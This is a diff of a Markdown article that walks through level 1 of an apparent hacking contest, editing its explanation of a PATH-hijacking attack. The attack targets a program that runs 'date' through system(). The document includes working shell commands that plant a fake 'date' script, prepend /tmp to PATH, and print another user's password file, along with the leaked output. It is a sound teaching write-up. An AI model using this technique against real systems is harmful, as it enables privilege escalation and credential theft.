janosgyerik/articles/hacking-contest-lessons/level1.md

 return 0;
 ```

-Notice that instead of using a native C function to get the date,
+Instead of using a native C function to get the date,
-the program uses the `system` function to run the `date` command.
+the program calls the `system` function to run the `date` command.
 We can look up what `system` does exactly with `man system`:
 it executes the specified command by calling `/bin/sh -c`.

 Consider how the shell executes a command that is not an absolute path:
-it takes the list of directories defined in the `$PATH` variable,
+for each directory defined in `PATH`,
-and checks if an executable file with the same name exists or not,
+it checks if there is an executable file,
-and runs the first match it finds.
+and it runs the first match.

-Therein lies our exploit:

-1. Create a script named "date",
+We can easily exploit this by creating our own script named `date`,
+prepend its base directory to `PATH`,
-   and make it print the content of `/home/level01/.password`:
+and make it print the contents of `/home/level01/.password`.

-        level00@box:~$ cat >/tmp/date
-        #!/bin/cat /home/level01/.password
-        ^D  # press Control-D to stop editing

-2. Make it executable

-        $ chmod +x /tmp/date

-3. Prepend the directory of the script to `PATH`,
-   so that our script is found before the real `date` program.

-        $ PATH=/tmp:$PATH

-Now if we run the `level01` command again:
+Here we go:

 ```
+level00@box:~$ echo '#!/bin/cat /home/level01/.password' > /tmp/date
+level00@box:~$ chmod +x /tmp/date
-$ /levels/level01/level01
+level00@box:~$ PATH=/tmp /levels/level01/level01
 Current time: aepeefoo
 #!/bin/cat /home/level01/.password
 ```